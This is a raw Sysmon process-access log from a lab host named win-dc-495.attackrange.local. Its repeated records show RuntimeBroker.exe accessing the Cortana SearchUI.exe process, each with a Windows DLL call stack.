13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 